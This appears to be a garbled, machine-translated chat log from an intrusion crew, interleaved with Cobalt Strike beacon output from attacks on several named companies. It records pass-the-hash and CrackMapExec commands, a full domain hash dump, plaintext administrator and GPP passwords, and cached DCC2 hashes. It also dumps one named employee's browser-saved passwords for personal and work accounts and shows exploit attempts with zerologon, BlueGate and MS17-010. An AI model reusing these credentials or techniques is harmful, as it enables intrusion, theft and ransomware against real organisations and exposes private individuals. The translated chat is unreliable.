10.0.6.153:445 (platform: 500 version: 4.9 name: SKYNASDMW domain: SKYTECH1) nas
10.0.2.127:445 (platform: 500 version: 6.1 name: SKYNASSC domain: VOLUME) nas

``````
 pth skytech1.local\BESAdmin b7e996a9282b045b181ab26ba27f6242
``````
10.0.2.130
10.0.6.9
10.0.6.27
10.0.2.7
10.0.6.51
10.0.6.13
````S(FJH*G&*SDifgtsidgtis7g ?600 then in slipslip so it's already in nemya in winlogon dk I always throw in slipslip just open winlogon how many? on one, get it then on dk) all in group dk[ ](https://mediaeveryone.com/group/gaudyme-com?msg=rmMqhDAK6JhpvFHc7) 1 and in slipslip sessions on a couple of servers fuck them
beacon> shell ping gaudyme.com
[*] Tasked beacon to run: ping gaudyme.com
[+] host called home, sent: 47 bytes
[+] received output:

Pinging gaudyme.com [72.52.147.20] with 32 bytes of data:
Reply from 72.52.147.20: bytes=32 time=85ms TTL=55
Reply from 72.52.147.20: bytes=32 time=84ms TTL=55
Reply from 72.52.147.20: bytes=32 time=84ms TTL=55
Reply from 72.52.147.20: bytes=32 time=85ms TTL=55

Ping statistics for 72.52.147.20:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 84ms, Maximum = 85ms, Average = 84ms

beacon> portscan 72.52.147.20 1-30,135,139,443,445
[*] Tasked beacon to scan ports 1-30,135,139,443,445 on 72.52.147.20
[+] host called home, sent: 93285 bytes
[+] received output:
(ICMP) Target '72.52.147.20' is alive. [read 8 bytes]
72.52.147.20:443
72.52.147.20:26
72.52.147.20:21 (220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------)

[+] received output:
72.52.147.20:25

[+] received output:
Scanner module is complete
``Simply there seems to be users and real domain realproscan 3 servers, one destination unreachable, the other redirects to the current dk whyomu 90% you have not labana 1-30,135,139,443, as we fucked the brain and not laba lilaba can take an existing domain of some companybut you can not go directly to this domain you know they sell clothes in insta and facebook have pages so we are talking about this) and that's not to say that laba not like laba I just say there quarantine mostly look wilsonart 30 trusts?https://shopthegaudy.com/ну however? there are about 30 trusts there but the neighboring one is definitely not a labaSo you know how we know how to shine the inventory for analytics labs?)yes let's close it)yes I also think it looks like a laba again...3 servers let's close it no trusts throw it on the server far away
```
32 Objects returned
``I'll give you dllkrasawa,``
[DC] 'DressinGaudy.local' will be the domain
[DC] 'Gaudy-DC2.DressinGaudy.local' will be the DC server
[DC] Exporting domain 'DressinGaudy.local'
1185 GAUDY-RDP1$ c4c6b3a3fa322dfb74dfb692fffb1aa54c7 532480
1119 SOCIAL-MEDIIA1$ 5f3854e8bd9d3aa5f68cb807b7891c22 4096
1114 BRITTANI-PC$ 5d8a95512df9e719207a0ed7686c417e 4096
1118 SOCIAL-MEDIA1$ cc9f2f930553c8516b2fc61f37f04910 4096
1107 CORPORATE-LAPTO$ 8bd91dcc12602c157f58b5d43b00d4ef 4096
1177 canon 8ef62adbb9127aa5cb4ddc8ceb483994 66048
1186 CORPORATE-DESKT$ 05a2b95c896aa1e365a78493f97036c0 4096
1110 QBDataServiceUser24 5c275327b45004dbb777866feacb7c44 66048
1237 QBDataServiceUser27 7e62fb7999eb74ee272401b607f1f110 66048
1147 DGLONGVIEW-PC$ e52b1d43fb366fe99fcc638a4730103b 4096
1606 GCPOS5A-LGM3 d29b9f741a059cde7e9ddfed5701ced7 66050
1605 GCPOS4A-LGM2 d29b9f741a059cde7e9ddfed5701ced7 66050
1604 GCPOS3A-LGM1 d29b9f741a059cde7e9ddfed5701ced7 66050
1234 GCPOS17A-LDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1235 GCPOS18A-LDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1610 GCPOS10A-TGM3 d29b9f741a059cde7e9ddfed5701ced7 66050
1611 GCPOS11A-CDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1612 GCPOS12A-CDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1613 GCPOS13A-CDG3 d29b9f741a059cde7e9ddfed5701ced7 66050
1601 GCPOS1A-TDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1603 GCPOS2A-TDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1607 GCPOS6A-TXDG1 d29b9f741a059cde7e9ddfed5701ced7 66050
1608 GCPOS7A-TXDG2 d29b9f741a059cde7e9ddfed5701ced7 66050
1609 GCPOS8A-TGM1 64f12cddaa88057e06a81b54e73b949b 66050
1602 GCPOS9A-TGM2 d29b9f741a059cde7e9ddfed5701ced7 66050
1210 allisonp 47b178d121cd3bab2192988418dfc888 66050
1175 canton 399f140089c0e3d11c7b8267d11eb011 66048
1217 social 48ae08e40717fc5d1075610f5a6d14f0 66048
1220 order 64ad7b9e2614ff9b9082025ff12976fe 66050
1229 sabrinah 48ae08e40717fc5d1075610f5a6d14f0 66050
502 krbtgt 231b0468e1c72213ef935e8cb4b4906f 514
1113 QBPOSDBSrvUser 90d145e86ae9f78a6e61d1fec6cfbb5f 66048
1214 ROOK 0d1d3a9a35ad2c91b12b9e0a9a9a83e169 66050
1219 Shopthegaudysite 64ad7b9e2614ff9b9082025ff12976fe 66050
1197 receiving2 3be8bfea417bb754d098159f04dbc239 66050
1244 VMPro d5d2270b5b056635450ab6139ff44db9 66048
1222 Careers 64ad7b9e2614ff9b9082025ff12976fe 66048
1221 admin 64ad7b9e2614ff9b9082025ff12976fe 66048
1146 jpu c6e4af5358661caf7a1e5d5a1d7f771b 66048
1241 gaudy 72bb5d55d77daf7721d92f80974a716d4 66048
1161 ncp fe64f8d8957e7236a923810afc8002c4 66048
1188 Info 41c3a27426f8b504ddcdc54dbf9ac6e3 66048
1215 sales 64ad7b9e2614ff9b9082025ff12976fe 66048
1223 orders ec659a6bff5d09327e805a2faf06fc94 66048
1239 orders 64f12cddaa88057e06a81b54e73b949b 66048
1157 hbt bbd870afdcc36d200a739c193eed5e6d 66048
1216 CustomerService ec659a6bff5d09327e805a2faf06fc94 66048
1159 klm b1677919e2aa45ba57959305e76a5946 66048
2105 grantp fdb219f9e944f46ef3aeec0686917e86 66048
503 DefaultAccount 31d6cfe0d16ae931b73c59d7e0c089c0 514
1195 SOCIALMEDIA1$ c83ce529704a20e431c48e000caaf0cb 4096
1168 SOCIALMEDIA3$ dfd33f42d4cfe4263069b1520ab2d898 4096
1616 MIKALAPTOP$ dc8b3717fe624123307cc1cea924b7b6 4096
1238 CORPORATE2$ e842adcc65fb28f339df23841037da51 4096
1236 madisonc 989a6a62caf5177d82ae02ba3c9c0eb0 66050
1192 GM103 ff6baa1584e0f920a1224947ee436067 66048
1108 emm 9ef20ca8484efe69a7197730a9b8badc 66048
1231 LeahP b080b686db8076775a51272b8a07f419 66050
2117 cooperm 81cd9c07ca5bdc15ed2dde1d45cccef7 66048
1242 QBDataServiceUser28 f9afe04ed33db257f4f6e4a126aa6003 66048
2118 QBDataServiceUser29 560e002747f32bf8dc26005978fefa3e 66048
1240 kaylab 285da02342607559528b49ae60d909b3 66048
1233 DG108 ece4a880865e765d57733539931b334b 66048
1191 GM106 3ea7b213b7e25cc0cce68803303952b5 66048
1155 bdc 872d591814c3eb168a120d4067888885 66048
1619 GCPOS16A$ 9997926294c6ee5932a5ebd94f0f8355 4096
1218 Breer efa36a734a1aba14b95bcd0f9ceb1610 66048
1194 MeaganC 662ce6b8aa70d5ed8f96b25d98c3743b 66048
1000 GAUDY-DC1$ 02fab4f0918492e698ae8b519a992fa7 4096
2106 SOCIAL3$ 517ab1040e57c71cdd9eb021318335e2 4096
1106 jmr 554193c8030f36f98504a0fdfb63b3ba 66048
1224 DG-TYLER-OFFICE$ 147e9e3fd70aa5f9fe99c9880199e543 4096
2114 socialmedia3 d14687e5eebe9af70f2e30d49f4759ea 66048
1227 GCPOS15A$ 4f87b85d2fb489f3f4cd927d51d85d06 4096
1190 DG102 2c5c4e9f4ba709322f13f7df92619dd6 66048
1226 GCPOS14A$ 774454456817213d7882483d4eb3f910 4096
1620 POS14 64f12cddaa88057e06a81b54e73b949b 66048
2115 MackenziD 87c7bec5244e04ff5286b332f7a534dd 66048
1621 pos15 64f12cddaa88057e06a81b54e73b949b 66048
1622 POS16 64f12cddaa88057e06a81b54e73b949b 66048
1109 JENIRAMSEY-PC$ 837dadb16d5fbe52eeb431e871bbfd6a 4096
1193 DG105 a733b31bc8855948eef5217fb77e6837 66048
2121 kimw 8908a802d83a41c2178c47dbb53cf1c1 66048
1163 texarkana a733b31bc8855948eef5217fb77e6837 66048
1618 DG-TEX-OFFICE$ 878b13be8f93134e0f115ee09d0dfdd8 4096
2120 larkinp 8837daf55148dcc8352a67b761c37e8e 66048
1617 SHIPPING$ 02c10a5073b82fe6782582a3ddea72f8 4096
1245 OWNER-PC$ 70cad180b2e3f00380211e955197dd43 4096
1230 DGLongview ece4a880865e765d57733539931b334b 66048
1160 longview ff6baa1584e0f920a1224947ee604367 66048
1170 corporate 91631b2dba583d2133168dcefa82bc63 66048
1614 CORPORATE$ 6927c73ce468477e647563063937f2b4 4096
2113 clittleton 5f2f93f575aef31552177a4e70b4980e 66048
1202 sharies 866f661b57f5f233e10fdd1569980c44 66048
2125 meganl 5965d4ddc4bde0f6fcb32fb07a1a625b 66048
2122 teresac 78b5fb4330f3807604e449a52af8b5ad 66050
2108 SOCIAL2$ 5cc5391f1c26ff59544b474f47ef0477 4096
1199 receiving 81cd9c07ca5bdc15ed2dde1d45cccef7 66048
1165 socialmedia1 933062fa0aee8303a48f070887208732 66048
2107 SOCIAL1$ 47a04b5e303b009aa595cd47f47eb7ab 4096
2109 Katelync 9647b5f0f1136f99333939a3373f0899 66048
1148 tim 0746a084694c267c15fe9c1081b05cf9 66048
2119 magenl 5965d4ddc4bde0f6fcb32fb07a1a625b 66048
1153 dg 2c5c4e9f4ba709322f13f7df92619dd6 66048
1228 website 0bd318c29d9542e09abbee52463a46fb 66048
2111 Rockwall a3498136f2eb7322d7589605346386c5 66048
1164 tyler 3ea7b213b7e25cc0cce68803303952b5 66048
1123 MIKADESKTOP$ c88b197b373b29b943459015891e4abf 4096
500 Administrator 2bebaecfce9530051a337ca7a299c71c 512
2126 QBDataServiceUser31 894d6d5d1a0478e345d2e6f07cfdd779 66048
2123 cindyh e2e9a2a7db389a08cfbfc8be07d6d989 66048
1122 LABEL$ 977f7a1eb84ea5a15d5ec435cd40bfc9 4096
2112 ROCKWALL-BACKOF$ edb60636f3d2fc8581decf3a360ccb2f 4096
1207 Label 873e50fd637d0d3ded9af361d32d8d62 66048
1623 DGW-PC$ 48be5acefeae8f107cd967f647f7af01 4096
1117 ACCOUNTING2$ 5995fd09c96b540bd3e440793c22fc50 4096
1615 RECEIVING$ 6f54a61c7fa05beb879ddb0ced50b071 4096
1225 GM-TYLER-OFFICE$ 8be51ee606ede11119acaf3731071326 4096
1121 socialmedia2 60cafefefc6658a34bc7032d29f7614032 66048
1145 dat 5e481f285545336512794748d10e16b9 66048
1243 GAUDY-DC2$ f57e713d19f3c2f5e24627014549951e 532480
2124 destineeg bd3d4fbd9e1f03c50106eeee4b54823c 66048

``SharpShares didn't give out the balloon, let ShareFinderkerbs no)``I just noticed and let's drop them in the processkerbs? shufflefinder? no elevate has worked outthecurrentuserdomainuserbut here domain users are LA```.
The request will be processed at a domain controller for domain DressinGaudy.local.

Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator bdc canton
corporate DG102 DG105
DG108 GCPOS10A-TGM3 GCPOS11A-CDG1
GCPOS12A-CDG2 GCPOS13A-CDG3 GCPOS17A-LDG1
GCPOS18A-LDG2 GCPOS1A-TDG1 GCPOS2A-TDG2
GCPOS3A-LGM1 GCPOS4A-LGM2 GCPOS5A-LGM3
GCPOS6A-TXDG1 GCPOS7A-TXDG2 GCPOS8A-TGM1
GCPOS9A-TGM2 GM103 GM106
jmr katelync kimw
ROOK tim
The command completed successfully.
```
```
The request will be processed at a domain controller for domain DressinGaudy.local.

Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator
The command completed successfully.
```
```
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
DGW-PC
DRESSINGAUDY\Domain Admins
DRESSINGAUDY\Domain Users
The command completed successfully.
ah, ok I respawn in the input there is yes it falls off my coba restart then don't refresh it overall not critical request ad_ous or ad_group - session falls off today they will be new not gonna waste more time ok, fuck it, maybe they have off-line backups or something backups server is not opening 10 servers I checked
there's no note, i'll help you in STAKC. i still have everything patched (tell @user3 and @user9 they did a good jobIf you want to use zerologon, what tactic/sequence of action would you advise?I'm just not that familiar with openssl, so I thought maybe you've caught a similar thing before and know how to fix it...As I understand it, a bug in Ubuntu seems to be the same error? `proxychains python3 RDGScanner.py 172.31.190.10 3391 `proxychains python3 rdg_scanner_cve-2020-0609.py 172.31.190.10 `proxychains python3 BlueGate.py 172.31.190.10 -M check
`How do you run it and what do you run?
```
df734@vps:~$ pip3 freeze
certifi==2019.11.28
cffi==1.14.3
chardet==3.0.4
cryptography==2.8
idna==2.8
netaddr==0.8.0
pycparser==2.20
pyOpenSSL==19.0.0
requests==2.22.0
six==1.14.0
urllib3==1.25.8

``https://www.pyopenssl.org/en/stable/install.html``python3-openssl is already the newest version (19.0.0-1build1).````
 sudo apt install pyOpenSSL
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package pyOpenSSL

Did you install this? And the error is the same everywhere in the same place.
```
[system_default_sect]
MinProtocol = SSLv3
CipherString = DEFAULT@SECLEVEL=1
Which one? https://github.com/ollypwn/BlueGate
https://github.com/MalwareTech/RDGScanner
https://github.com/2d4d/rdg_scanner_cve-2020-0609дай link to the script used[ ](https://mediaeveryone.com/group/snpartners-com?msg=oEWxKNC4EvZLQwGSm) no, didn't use ``.
Traceback (most recent call last):
  File "BlueGate.py", line 130, in <module>
    connection = Connection(args.host, args.port)
  File "BlueGate.py", line 68, in __init__
    self.connect()
  File "BlueGate.py", line 84, in connect
    self.connection.do_handshake()
  File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1915, in do_handshake
    self._raise_ssl_error(self._ssl, result)
  File "/usr/lib/python3/dist-packages/OpenSSL/SSL.py", line 1647, in _raise_ssl_error
    _raise_current_error()
  File "/usr/lib/python3/dist-packages/OpenSSL/_util.py", line 54, in exception_from_error_queue
    raise exception_type(errors)
OpenSSL.SSL.Error: [('SSL routines', 'state_machine', 'internal error')]
df734@vps:~$

``@tl1 Did you use CVE-2020-0609 yourself? Catching ssl errors. How to fix it?
Windows Remote Desktop Gateway (RD Gateway) Remote Code Execution Vulnerability
Is it bleedingghost which? Okay, look at itSVE-2020-0609 there is no way out from here. What's wrong with it?
i will try zerologon not one of them is not pinged i will check you have them available? yes trusts hell? take it off and throw it here by the way i understand you did not take off hell so you can from the current domain through the trust take off the kerbs other domains.... like adna trust domains? there - where? how do i go there? i have an idea, no. have you removed kerbs from trusts? there are 4 in the file. two in quarantinetraistov no?[ ](https://mediaeveryone.com/group/snpartners-com?msg=MqT5FqXhoeR4zLLdw) well there are more and not sure?I will try zerologon.com tomorrow. Tomorrow I will try to zerologon start - no more options left...
beacon> portscan 172.31.190.47 80,443,25,110,995,143,993,465 icmp 10
[*] Tasked beacon to scan ports 80,443,25,110,995,143,993,465 on 172.31.190.47
[+] host called home, sent: 93245 bytes
[+] received output:

[+] received output:
Scanner module is complete
``Check the web ports and the ports of the mail service, for example''.
>operatingSystem: Windows Server 2003
>operatingSystemVersion: 5.2 (3790)
>operatingSystemServicePack: Service Pack 2
>dNSHostName: DETADP01.gpj.loc
on specific hosts operating systems which you have in your AD, are they even registered if they are empty - then the rest of the domain can already be scanned if there is "empty" then sevens and 2008pod ms17-010 first choose XP / 2003 machine terrible selection criteria))) this will be most effective given that the other main paths we have tried) I propose to ping all live hosts in the domain
and ALL go to this splot already with the creeds of the domain user to see if it is not connected to the IPC$ tree does not only need to include verbose and on what principle these hosts were selected? so here like nothing has scanned ... no answers, no .... and what was the output, if i could see which ones you randomly scanned? just because we have domain-creds - with them it is better "start" on some axes above 7 were not in the domain machines vulnerable to this exploit? and what about 17-010 at the end? yes at the end we only have her pass - but it does not roll anywhere as an administrator, right?
[+] received output:
[+] Success! Username: SBolley. Password: thisduckingsucks!
[*] Completed.
What's the error?
ERROR: FindOne : Exception calling "FindOne" with "0" argument(s): "The server is not operational.
ERROR: "
ERROR:
ERROR: At line:145 char:36
ERROR: + $user = $search.FindOne <<<< ()
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DotNetMethodException
ERROR:
ERROR: user : The variable '$user' cannot be retrieved because it has not been set.
ERROR:
ERROR: At line:146 char:22
ERROR: + if ($user <<<< -ne $null)
ERROR: + CategoryInfo : InvalidOperation: (user:Token) [], RuntimeException
ERROR: + FullyQualifiedErrorId : VariableIsUndefined

``interesting''
[+] received output:
Parsing file: \\GPJ.LOC\sysvol\GPJ.LOC\policies\{20FA66DA-01F3-493D-A72B-23C077395633}\Machine\Preferences\Groups\Groups.xml
[RESULT] Username: Administrator (built-in)
[RESULT] Changed: 2015-06-29 09:18:32
[RESULT] Password: DdhGmek/pc
[RESULT] Username: install
[RESULT] Changed: 2015-06-29 09:46:46
[RESULT] Password: rt/98740/pc
[RESULT] Username: Lack
[RESULT] Changed: 2014-10-06 09:45:54
[RESULT] Password: RT+farbe

``17-010 checked? Gentlemen, how is it with the yuac bypass? still no yuac bypassed? Better let it be like this
```
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
ADAXES AMoultonADM bigfix
ELittleADM JStriberADM pwwDirAdmin
TMunsonADM

``Lest we forget, I wrote in #generalwhy don't you take everything off at once as a list? 2 times it reminds me
#local admin
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
GPJ\SBolley
GPJHelp
The command completed successfully.

``local admins and enterprice?
--- Chromium Credential (User: SBolley) ---
URL : https://www.facebook.com/login.php
Username : simon.r.bolley@gmail.com
Password : spiderman!23

--- Chromium Credential (User: SBolley) ---
URL : https://ol.miniusa.com/Shared/Home/LoginPost
Username : srbolley
Password : Canada23

--- Chromium Credential (User: SBolley) ---
URL : https://gxstradeweb.gxsolc.com/pub-log/login.pl
Username : gpjohnson
Password : password

--- Chromium Credential (User: SBolley) ---
URL : https://care.siriusxm.com/login_execute.action
Username : simon.r.bolley@gmail.com
Password : Canada!23

--- Chromium Credential (User: SBolley) ---
URL : https://www.amazon.com/ap/signin
Username : simon.r.bolley@gmail.com
Password : Canada!23

--- Chromium Credential (User: SBolley) ---
URL : https://sts.gpj.com/adfs/ls/
Username : simon.bolley@gpj.com
Password : thisduckingsucks!02

--- Chromium Credential (User: SBolley) ---
URL : https://jdepd.project.com/jde/E1Menu.maf
Username : sbolley
Password : Canada!75

--- Chromium Credential (User: SBolley) ---
URL : https://login.xfinity.com/login
Username : bolley2244
Password : canada!23

--- Chromium Credential (User: SBolley) ---
URL : https://secure2.homedepot.com/account/view
Username : simon.r.bolley@gmail.com
Password : spiderman23

--- Chromium Credential (User: SBolley) ---
URL : https://app.smartsheet.com/b/home
Username : simon.bolley@gpj.com
Password : Canada!64

--- Chromium Credential (User: SBolley) ---
URL :
Username : sbolley
Password : thisduckingsucks!01

--- Chromium Credential (User: SBolley) ---
URL : https://www.delta.com/
Username : 9015769087
Password : Getmeoutofhere!23

--- Chromium Credential (User: SBolley) ---
URL : https://account.activedirectory.windowsazure.com/passwordreset/register.aspx
Username : In what city does your nearest sibling live?
Password : *************

--- Chromium Credential (User: SBolley) ---
URL : https://passwordreset.microsoftonline.com/
Username : simon.bolley@gpj.com
Password : thisduckingsucks!02

--- Chromium Credential (User: SBolley) ---
URL : https://accounts.google.com/signin/challenge/sl/password
Username : simon.bolley@gpj.com
Password : thisduckingsucks!02

--- Chromium Credential (User: SBolley) ---
URL : https://login.microsoftonline.com/8eaa3b9e-ddf5-409e-87bf-df1edbbeaf70/login
Username : simon.bolley@gpj.com
Password : thisduckingsucks!02

--- Chromium Credential (User: SBolley) ---
URL : https://accounts.uber.com/forgot-password/
Username : simon.bolley@gpj.com
Password : getmeouttahere!23

--- Chromium Credential (User: SBolley) ---
URL : https://auth.uber.com/login/session
Username : simon.bolley@gpj.com
Password : getmeouttahere!23

--- Chromium Credential (User: SBolley) ---
URL : https://account.activedirectory.windowsazure.com/passwordreset/register.aspx
Username : Simon.r.bolley@gmail.com
Password : *************

--- Chromium Credential (User: SBolley) ---
URL : https://player.siriusxm.com/
Username : simon.r.bolley@gmail.com
Password : Canada!23

--- Chromium Credential (User: SBolley) ---
URL : https://www.homedepot.com/auth/view/signin
Username : simon.r.bolley@gmail.com
Password : spiderman23

--- Chromium Credential (User: SBolley) ---
URL : https://member.bcbsm.com/mpa/accountRecoverySelfService/accountRecoveryOptions
Username : sbolley
Password : Spiderman23

--- Chromium Credential (User: SBolley) ---
URL : https://member.bcbsm.com/mpa/responsive/
Username : sbolley
Password : Spiderman23

--- Chromium Credential (User: SBolley) ---
URL : https://madisonheights.greenlanternpizza.com/ordering/
Username : simon.r.bolley@gmail.com
Password : thursdaynight!23

--- Chromium Credential (User: SBolley) ---
URL : https://www.cbssports.com/login
Username : simon.r.bolley@gmail.com
Password : spiderman23

--- Chromium Credential (User: SBolley) ---
URL :
Username : simon.r.bolley@gmail.com
Password : lovemymini!23

--- Chromium Credential (User: SBolley) ---
URL : https://care.siriusxm.com/updateinternetcredentials_execute.action
Username : simonsminicooper
Password : ilovemymini!23

--- Chromium Credential (User: SBolley) ---
URL : https://player.siriusxm.com/
Username : simonsminicooper
Password : ilovemymini!23

--- Chromium Credential (User: SBolley) ---
URL : https://newlook.dteenergy.com/wps/wcm/connect/dte-web/login
Username : simon.r.bolley@gmail.com
Password : spiderman23

--- Chromium Credential (User: SBolley) ---
URL : https://milogin.michigan.gov/eai/login/authenticate
Username : srbolley@71
Password : ThisSucksGPJ!97

--- Chromium Credential (User: SBolley) ---
URL : https://app.naviabenefits.com/app/
Username : srbolley
Password : 2020Sucks

``This is easier than that.
beacon> net domain_controllers
[*] Tasked beacon to run net domain_controllers
[+] host called home, sent: 104518 bytes
[+] received output:
Domain Controllers:

 Server Name IP Address
 ----------- ----------

[+] received output:
 DETMSDC01 192.168.11.42
 LAXMSDC01 192.168.30.42
 BNGMSDC01 192.168.110.42
 SFOMSDC01 10.200.132.52
 DETMSDC02 192.168.11.43
 TOKMSDC01 192.168.90.6
 SHARMSDC01 10.220.136.40
 SYDMSDC01 192.168.101.42
 SNGMSDC01 192.168.241.42
 NYCMSDC01 10.201.36.42
 AUSMSDC01 192.168.221.42
 SFOAMSDC01 10.200.164.42
 DENMSDC01 10.200.196.42
 LONMSDC02 10.210.4.42
 BEIMSDC02 192.168.120.28
 SHAMSDC02 192.168.140.3
 BOSMSDC01 10.200.228.42
 HKGMSDC01 192.168.230.42
 STURMSDC01 192.168.61.42
 PLNMSDC02 10.200.4.42
 MELMSDC01 10.220.68.42
 SHARMSDC02 10.220.136.42
 STURMSDC10 192.168.66.42
 STURMSDC20 192.168.67.42
 ROCMSDC01 10.200.100.42
 SFO2MSDC03 10.200.132.42
 STUGMSDC10 192.168.71.18

``This is all servers (filtered by ``Domain Controllers`` )
```
DETMSDC02
TOKMSDC01
SHARMSDC01
SYDMSDC01
SNGMSDC01
NYCMSDC01
AUSMSDC01
SFOAMSDC01
DENMSDC01
LONMSDC02
BEIMSDC02
SHAMSDC02
BOSMSDC01
HKGMSDC01
STURMSDC01
PLNMSDC02
MELMSDC01
SHARMSDC02
STURMSDC10
STURMSDC20
ROCMSDC01
SFO2MSDC03
STUGMSDC03
STUGMSDC10
LAXMSDC01

``Are the local admins? The enterpays, dc and ad infos? The domain admins
```
ELittleADM
JStriberADM
AMoultonADM
TMunsonADM
bigfix
ADAXES
pwwDirAdmin
``user7user5user2No session only ran it again and as you wrote inj will die right away, or later appear. injected dll and ekcts then shut down the last server ``
beacon> shell ping francedc1
[*] Tasked beacon to run: ping francedc1
[+] host called home, sent: 45 bytes
[+] received output:

Pinging francedc1.rtpco.local [10.4.0.25] with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Request timed out.

[+] received output:
Request timed out.

Ping statistics for 10.4.0.25:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),

beacon> shell ping francedc1.rtpco.local
[*] Tasked beacon to run: ping francedc1.rtpco.local
[+] host called home, sent: 57 bytes
[+] received output:

Pinging francedc1.rtpco.local [10.4.0.25] with 32 bytes of data:
Request timed out.
Request timed out.

[+] received output:
Reply from 10.4.0.19: Destination host unreachable.

[+] received output:
Request timed out.

Ping statistics for 10.4.0.25:
    Packets: Sent = 4, Received = 1, Lost = 3 (75% loss),


``This is for @user7 found104....69480 pid I say that there is oneI have all ahk stand there is one live session that needs to be locked so check the ping- Check whether the registry entry was created with the bicon shell reg query HKCU\Environment to nasa cling to destroying```
on 10 armas: 0 file(s) copied. of them:

no 445:
    MFGWIN10-1: 10.0.0.110
    ENGINEERING-PC2: 10.1.4.205
    RYAN-GT73VR: 10.1.4.164
    SCCY-LT07: 10.0.0.26
    SCCY-05: 10.0.0.59
    SCCY-01: 10.0.0.76
    SCCY-03: 10.0.0.57

on dir under YES - Access is denied.
    SCCY-20: 10.1.4.221
    DESKTOP-UMQJ809: 10.1.4.230

us:
    SCCY-NAS: 10.1.4.175:445

    balls:
        Approved_Documentation
        Engineering
        IPC$
        Quality
        Tool_Room
        usbshare1
        
    all except usbshare1 are masked
        shell net use * \\10.1.4.175\usbshare1
        The password is invalid for \10.1.4.175/usbshare1.

        shell net use * \\10.1.4.175\usbshare1 /user:SCCY\vdsadmin T@ng0D0wn!
        System error 1219 has occurred.
        Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again.
``````
Total AD servers: 5
Live Servers: 2
Pulled servers: 2
 
Total armies in AD: 134
Live armies: 28
Artems attracted: 18
``````
209.222.101.167:10918
uVTxvMXJAvo6Vxsuw6iFhfu6YtstdU9kKPV
``Yeah, wait till 2 and then start giving it to you``OAFIJHS&GDFIysui76fUESY&GUISKRTjug``[ ](https://mediaeveryone.com/group/wilsonart-com?msg=Xb7b59muRFPJqRcCR) yeah why not``cme smb 170.7.183.1 -u Administrator -p Csfixit3 --local-auth --lsa` to @tl2 can ask?i can't figure out if it's the other one)[ ](https://mediaeveryone.com/group/wilsonart-com?msg=x58LFJ5uCgN46uASB) so it's not among them)[ ](https://mediaeveryone.com/group/wilsonart-com?msg=9dZhAJKePR46j6kT3) so did you check if it's alive?
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 DCWAS01 170.7.2.220
 TNWAS01 170.7.14.203
 FLWAS01 170.7.20.220
 UKWAS01 170.7.70.210
 FRWAS02 172.25.168.125
 DRWAS01 170.7.132.51
``````
User name alexanm
Account active No
```
```
User name binnsv
Account active Yes
```
```
User name roeders
Account active Yes
```
```
User name lucase
Account active Yes
``````
* Username : Administrator
	 * Domain : WILSONART
	 * NTLM : 2caf37093fda2e2d172732487707cd31
          * Password : {}wallC2013
``This was taken through CrackMapExec. Is this even ntlm? found a live account?[ ](https://mediaeveryone.com/group/wilsonart-com?msg=xqEcvAXwhW2iBLkp3) .hhz, while we check it? ``WILSONART.COM/alexanm:$DCC2$10240#alexanm#1104defc310747217d7ff2a4c987822e
WILSONART.COM/binnsv:$DCC2$10240#binnsv#e4e4edbc58ee8e74c18c5b6e05d78962
WILSONART.COM/roeders:$DCC2$10240#roeders#32b91b387aed7999ba32e38ea4926a78
WILSONART.COM/lucase:$DCC2$10240#lucase#431289c086694d207363fa44a1241269
WILSONART.COM/Administrator:$DCC2$10240#Administrator#927077252450f2289e35b2f7deb3d531 ``There sits yes - 170.7.183.1
192.168.1.6:445 - Success: '.\whsetup:Csfixit3' Administrator
```༼ つ ◕_◕ ༽つ normallyxp/7/10``WORKSTATION\Administrator:Csfixit3
```
170.7.120.128
170.7.123.36
170.7.181.244
170.7.120.174
170.7.30.50
170.7.180.26
170.7.180.21
170.7.180.83
170.7.159.83
170.7.180.16
170.7.183.1
170.7.12.205
170.7.12.114
170.7.180.19
170.7.8.19
170.7.120.13
170.7.122.41
170.7.120.165
170.7.121.70
170.7.182.20
170.7.180.18
170.7.180.82
170.7.181.242
170.7.122.153
170.7.76.133
170.7.120.1
170.7.182.59
170.7.181.242
170.7.180.131
170.7.183.41
170.7.183.36
170.7.159.83
170.7.121.87
170.7.120.146
170.7.180.133
170.7.180.134
10.69.246.13
170.7.180.137
170.7.122.115
170.7.121.62
170.7.121.86
170.7.120.154
170.7.120.118
170.7.121.44
170.7.122.153
170.7.120.167
170.7.121.45
170.7.183.1
170.7.183.50
170.7.180.18
170.7.120.151
170.7.120.121
170.7.121.148
170.7.120.100
170.7.12.114
170.7.123.44
170.7.180.16
170.7.123.36
170.7.120.174
170.7.120.165
170.7.182.90
170.7.171.200
170.7.120.127
170.7.120.115
170.7.191.11
170.7.191.85
170.7.182.58
170.7.121.117
170.7.121.9
170.7.121.70
170.7.180.70
170.7.182.99
170.7.182.95
170.7.182.37
170.7.180.69
170.7.183.18
170.7.182.20
170.7.182.27
170.7.182.18
170.7.183.243
170.7.181.244
170.7.182.83
170.7.180.89
170.7.180.89
170.7.182.17
170.7.49.11
170.7.183.71
170.7.49.13
10.100.49.72
170.7.49.15
170.7.49.16
10.100.49.77
170.7.120.151
170.7.180.26
170.7.180.21
170.7.180.83
170.7.180.82
170.7.181.124
170.7.181.123
10.100.22.69
170.7.120.126
10.102.66.33
170.7.12.205
10.102.66.32
170.7.171.185
170.7.122.115
170.7.76.115
170.7.76.116
